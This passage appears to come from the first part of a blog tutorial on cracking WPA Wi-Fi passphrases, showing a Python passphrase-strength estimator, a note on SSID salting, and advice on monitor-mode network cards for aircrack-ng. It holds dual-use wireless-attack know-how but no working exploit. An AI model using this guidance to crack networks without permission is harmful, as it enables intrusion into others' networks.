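    """Report whether a passphrase is covered by a wordlist and how long a
    search would take at the given guess rate."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    if any(not 32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("WPA passphrases are printable ASCII")
    words = {w.lower() for w in wordlist}
    covered = passphrase.lower() in words or base_word(passphrase) in words
    alphabet = sum(len(p) for p in POOLS if any(c in p for c in passphrase))
    keyspace = alphabet ** len(passphrase)
    if covered:
        seconds = len(words) / keys_per_second     # one full pass, worst case
    else:
        seconds = keyspace / 2 / keys_per_second   # brute force, on average
    return {"in_wordlist": covered,
            "keyspace_bits": round(math.log2(keyspace), 1),
            "seconds": seconds}


if __name__ == "__main__":
    for candidate in ("swedishchef", "Swedishchef1", "q7#Vd2!xLp9z"):
        print(candidate, audit_passphrase(candidate, SAMPLE_WORDLIST))
    print(derive_pmk("password", "IEEE").hex())  # IEEE 802.11i test vector
```

Because the SSID is the salt, the same passphrase produces a different key on every differently named network, so a uniquely named network cannot be attacked with keys precomputed for common SSIDs.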


The Hardware
To begin cracking you'll also need a suitable network card, one that can be flipped into what's known as "monitor mode". The aircrack-ng website has a useful tutorial here: Is My Wireless Card Compatible?

If you do have a compatible card, use their Compatibility Drivers to see if aircrack-ng will work okay with it, and what drivers you'll need, if any.

If all that sounds a bit daunting, you can simply buy a suitable USB network card and bypass the one in your PC. What is the Best Wireless Card to Buy? will help. I picked up a USB-based RTL8187L device for a little over $20.



We're now ready for the fun stuff. Part II coming soon ...!
